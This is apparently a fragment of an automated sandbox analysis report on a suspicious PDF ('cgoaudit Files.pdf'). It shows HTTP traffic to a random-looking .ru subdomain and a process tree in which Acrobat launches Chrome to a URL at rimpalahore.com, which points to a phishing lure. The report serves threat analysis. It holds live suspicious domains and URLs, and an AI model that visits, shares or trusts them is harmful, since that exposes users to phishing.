                                                                                          Host: u91ndqfef6ahbx8nw9xixpx17ig1uuxy5g2sbqn7uf6ocw1sehswzqp7qctp.birsbunh.ru
                                                                                          Connection: keep-alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          Accept: */*
                                                                                          Sec-Fetch-Site: none
                                                                                          Sec-Fetch-Mode: cors
                                                                                          Sec-Fetch-Dest: empty
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:58 UTC901INHTTP/1.1 200 OK
                                                                                          Date: Wed, 27 Nov 2024 14:15:58 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Access-Control-Allow-Origin: *
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a9hLkIJlRBRj4Vv9IcS8Q4SimEAw9SEt2iJHTUMLgcSiyytvtiM9EAbDFPIM0IjGNIH%2BKFcGmgPcBzKcZDPrfPPYq%2Fl90pE%2FLPsR7fYYwU1ZYFGDlgUw9EK4AaKfmkTt%2FSU7YJcNd%2FXjgkFq4N0Te5Wrnr66csyevrEpD80rdqcDXwtoN3JAdwRCWqwUeNnd9zxCPgYncpuV2nQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e92bbb8b82d188d-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1517&min_rtt=1507&rtt_var=585&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1063&delivery_rate=1839949&cwnd=174&unsent_bytes=0&cid=cf4fd9cbe4bbaa2c&ts=1142&x=0"
                                                                                          2024-11-27 14:15:58 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                          Data Ascii: 11
                                                                                          2024-11-27 14:15:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Click to jump to process

                                                                                          Click to jump to process

                                                                                          Click to dive into process behavior distribution

                                                                                          Click to jump to process

                                                                                          Target ID:0
                                                                                          Start time:09:14:33
                                                                                          Start date:27/11/2024
                                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\cgoaudit Files.pdf"
                                                                                          Imagebase:0x7ff6e8750000
                                                                                          File size:5'641'176 bytes
                                                                                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:3
                                                                                          Start time:09:14:35
                                                                                          Start date:27/11/2024
                                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                          Imagebase:0x7ff7e6b80000
                                                                                          File size:3'581'912 bytes
                                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:4
                                                                                          Start time:09:14:36
                                                                                          Start date:27/11/2024
                                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1572,i,18327643351867772495,3848152203052608152,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                          Imagebase:0x7ff7e6b80000
                                                                                          File size:3'581'912 bytes
                                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:5
                                                                                          Start time:09:14:38
                                                                                          Start date:27/11/2024
                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://rimpalahore.com/odin/
                                                                                          Imagebase:0x7ff7f9810000
                                                                                          File size:3'242'272 bytes
                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:6
                                                                                          Start time:09:14:39
                                                                                          Start date:27/11/2024
                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1972,i,16109135660613449894,198606018373725258,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                          Imagebase:0x7ff7f9810000
                                                                                          File size:3'242'272 bytes
                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          No disassembly